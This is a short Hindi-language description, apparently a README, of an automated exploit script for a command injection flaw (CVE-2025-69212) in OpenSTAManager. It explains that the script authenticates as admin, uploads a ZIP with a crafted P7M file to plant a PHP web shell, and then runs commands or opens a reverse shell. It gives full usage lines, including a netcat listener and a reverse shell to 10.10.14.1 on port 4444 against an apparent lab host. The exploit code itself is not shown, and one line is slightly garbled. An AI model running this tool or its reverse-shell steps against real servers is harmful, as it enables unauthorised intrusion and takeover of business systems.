
OpenSTAManager में CVE-2025-69212 कमांड इंजेक्शन के लिए स्वचालित एक्सप्लॉइट, जिसमें एडमिन प्रमाणीकरण, दुर्भावनापूर्ण ZIP अपलोड, और रिवर्स शेल या कमांड निष्पादन शामिल है।
CVE-2025-69212 के लिए एक पूर्णतः स्वचालित एक्सप्लॉइट स्क्रिप्ट, जो OpenSTAManager में एक कमांड इंजेक्शन भेद्यता है। यह स्क्रिप्ट एडमिन क्रेडेंशियल्स से प्रमाणीकरण करती है, एक ZIP संग्रह में तैयार की गई P7M फ़ाइल के माध्यम से एक दुर्भावनापूर्ण PHP वेब शैल तैनात करती है, और कमांड निष्पादन या रिवर्स शेल प्रदान करती है।
invoice.p7m इंजेक्शन)।python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>
उदाहरण:
एकल कमांड निष्पादित करें:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'
रिवर्स शेल प्राप्त करें:
# Start your netcat listener in another terminal:
nc -lvnp 4444
# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444